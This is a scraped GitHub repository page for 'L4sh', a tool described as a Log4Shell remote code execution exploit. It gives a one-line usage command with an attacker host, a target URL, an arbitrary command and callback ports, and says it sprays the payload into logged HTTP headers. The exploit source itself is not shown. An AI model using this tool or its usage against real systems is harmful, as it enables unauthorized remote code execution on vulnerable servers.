Skip to content
/ L4sh Public

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

257 stars 65 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

cyberstruggle/L4sh

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
db
db
 
 
utils
utils
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
main.py
main.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Log4Shell RCE Exploit

asciicast

fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent

Usage

python main.py -i lhost -u http://target:targetport -c "command_to_execute" -p lhttp_port -l lldap_port

Requirements

  • java-8-openjdk
  • pip install -r requirements.txt
  • python3.6+

About

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Topics

log4j log4shell

Resources

Readme
Activity
Custom properties

Stars

257 stars

Watchers

7 watching

Forks

65 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages